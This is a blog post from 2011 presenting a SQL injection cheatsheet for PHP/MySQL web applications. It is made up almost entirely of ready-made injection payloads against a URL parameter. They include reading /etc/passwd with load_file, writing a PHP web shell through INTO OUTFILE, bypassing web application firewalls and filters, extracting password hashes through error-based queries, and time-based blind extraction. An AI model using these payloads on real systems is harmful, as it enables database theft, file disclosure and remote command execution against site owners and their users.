SQL injection cheatsheet

Slack3rsecurity’s SQL injection cheatsheet 2011.

Hello world! I have decided to write a cheatsheet containing all that i have learnt from 2 years in the web application security field, in this post i will be focusing on SQL injection in regards to a PHP/MySQL enviroment .

Comments

/* – Multi line comment.

# – single line comment.

— – single line comment.

/*!*/ – Mysql special comments.

Whitespaces.

+, %2B, %20, %09, %0d ,%0А, /**/, /*foo*/

Global system variables

@@datadir  // Mysql data directory.

@@version_compile_os –  //OS Mysql is running on.

@@version – //Mysql database version.

user() – //Current database user.

@@log_error – //Path to error log.

database() – //Current database.

Columns in a SELECT.

file.php?var=1 order by 10–      //Unknown column ’10’ in ‘order clause’

file.php?var=1 and(select * from table)=(1)–   //Operand should contain 9 column(s)

Encoding. //For matching collations.

file.php?var=1 union select cast(version() as latin1)–  //5.0.11

file.php?var=1 union select convert(version() as binary)– //5.0.11

file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)– //5.0.11

file.php?var=1 union select unhex(hex(versions()))– //5.0.11

File_priv.

file.php?var=1 union select user()– //Checking current user. root@localhost

file.php?var=1 union select file_priv from mysql.user where user=’root’–  //Checking for the file priveledge on current user, Y =Yes N=No.

file.php?var=1 union select load_file(‘/etc/passwd’)–  // Loading system files.

file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)–  // Loading system files with error based injection.

file.php?var=1 union select “<?php system($_GET[c]);?>” into outfile ‘/dir/dir/shell.php’–  // Write code to a file.

file.php?var=1 limit 1 into outfile ‘/dir/dir/shell.php’ lines terminated by “<?php system($_GET[c]);?>”–+  //Write to a file.

WAF & security bypasses.

file.php?var=1 /*!union*/ /*select*/ version()– //MySQL comments.

file.php?var=1 unUNIONion seleSELECTct version()– //Filter bypass

file.php?var=1/**/union/**/select/**/version()–  //Whitespace bypass

file.php?var=1 UnION SElecT version()–  //Mixed upper/lower

file.php?var=1 uni/**/on sel/**/ect version()– //php comments.

file.php?var=1 uni%6Fn select version()– //URL encoding.

file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users–  //Taking advantage of a WAF that only decodes input once.

file.php?var=1 0x414141414141414141414141414141414141 union select version()–  //Buffer overflow.

file.php?var=1 union select 0x3a3a3a–  //Encode to bypass magic quotes.

Extracting data from MySQL errors.

Rand()

file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)– 

file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))–

file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) —

file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))–

file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) —

Name_const(Mysql 5.0.12 > 5.0.64)

file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)–

Extractvalue & updatexml (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))–  //Xpath error

file.php?var=1 and updatexml(rand(),concat(0x3a,version()))– //Xpath error

Misc.

file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)– //Credits BlackFan.

file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)– //Credits Blackfan.

file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a–

Injecting into an order by

file.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))–

file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))–

Blind.

file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) — //time based BSQLi

file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) —  //Time based BSQLi

file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f
,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,
$,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,\\,|,{,},[,],:,;, ,’)),1,1) FROM in
formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5))–  //BSQLi using bit shifting credits to http://www.websec.ca

Have a question or something you have to add? shoot me a message.

Helpfull links.

http://www.mysql.com

http://www.php.net

http://www.websec.wordpress.com  //Great blog & good posts on web application security.

http://www.websec.ca

 
 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s